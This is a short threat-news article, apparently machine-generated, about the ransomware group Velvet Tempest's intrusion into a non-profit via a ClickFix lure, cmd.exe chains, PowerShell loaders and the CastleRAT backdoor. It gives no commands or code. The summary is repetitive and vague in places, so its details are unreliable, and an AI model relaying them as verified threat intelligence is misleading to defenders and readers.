Ethical Hacking News
The article discusses the case of Velvet Tempest, a ransomware threat group associated with deploying devastating ransomware strains such as Ryuk, REvil, Conti, BlackMatter, BlackCat/ALPHV, LockBit, and RansomHub. Researchers observed that the group utilized legitimate Windows utilities to deploy malware in an attack on a non-profit organization with over 3,000 endpoints and more than 2,500 users.
Velvet Tempest, a known ransomware threat group, has been involved in high-profile attacks using legitimate Windows utilities and social engineering tactics. The latest incident involves the use of ClickFix lure to gain initial access into a non-profit organization with over 3,000 endpoints and 2,500 users. The attackers used nested cmd.exe chains to fetch malware loaders, which were then used to download and execute additional payloads via PowerShell. CastleRAT backdoor was deployed, associated with CastleLoader malware loader, distributing multiple families of ransomware and information stealers. Velvet Tempest's tactics, techniques, and procedures (TTPs) demonstrate a high level of sophistication posing challenges to cybersecurity professionals.
Cybersecurity experts have been tracking a threat group known as Velvet Tempest, also referred to as DEV-0504, which has been involved in various high-profile ransomware attacks over the past few years. The latest incident observed by researchers at cyber-deception threat intelligence firm MalBeacon involves the use of legitimate Windows utilities and techniques commonly found in social engineering campaigns to deploy malware.
In late February 2026, the researchers discovered that Velvet Tempest had gained initial access into a non-profit organization with over 3,000 endpoints and more than 2,500 users. The attackers utilized a malicious advertising campaign designed to lead victims into using a ClickFix lure, which instructed them to paste an obfuscated command into the Windows Run dialog. Once executed, this command triggered a series of nested cmd.exe chains, which ultimately fetched the first malware loaders.
The obtained malware loaders were then used to download and execute additional payloads via PowerShell. This included compiling .NET components in temporary directories using csc.exe and deploying Python-based components for persistence on C:\ProgramData. The operation also involved the deployment of DonutLoader and the retrieval of CastleRAT backdoor, a remote access trojan associated with the CastleLoader malware loader.
CastleRAT is known for distributing multiple families of ransomware and information stealers. The use of legitimate utilities in this manner allows Velvet Tempest to bypass traditional security measures more effectively, making it challenging for defenders to detect the attacks.
Researchers noted that Velvet Tempest's deployment timeline included Active Directory reconnaissance, host discovery, and environment profiling, all facilitated by hands-on keyboard activities as well as the PowerShell script used to harvest credentials stored in Chrome. The IP address linked to tool staging for Termite ransomware intrusions provided crucial insight into the attack vector employed.
Velvet Tempest has been associated with deploying some of the most devastating ransomware strains: Ryuk, REvil, Conti, BlackMatter, BlackCat/ALPHV, LockBit, and RansomHub. The threat group's tactics, techniques, and procedures (TTPs) have demonstrated a level of sophistication that poses significant challenges to cybersecurity professionals.
The attackers' use of the ClickFix technique, which involves using social engineering methods to breach corporate networks, further highlights the evolving nature of ransomware threats. Multiple ransomware actors have adopted this technique in their attacks, making it essential for defenders to remain vigilant and adapt their strategies accordingly.
Furthermore, researchers observed that Velvet Tempest did not deploy the Termite ransomware in the observed intrusion. However, this incident underscores the adaptability of threat actors and highlights the importance of being prepared for a wide range of attack vectors.
In conclusion, the use of legitimate utilities by Velvet Tempest to deploy malware underscores the evolving nature of cyber threats. As threat actors continue to refine their tactics, it is essential for cybersecurity professionals to stay informed about emerging techniques and strategies used in these attacks.
Related Information:
https://www.ethicalhackingnews.com/articles/Ransomware-Threat-Actors-Utilize-Legitimate-Utilities-to-Deploy-Malware-The-Case-of-Velvet-Tempest-ehn.shtml
Published: Sat Mar 7 11:21:29 2026 by llama3.2 3B Q4_K_M
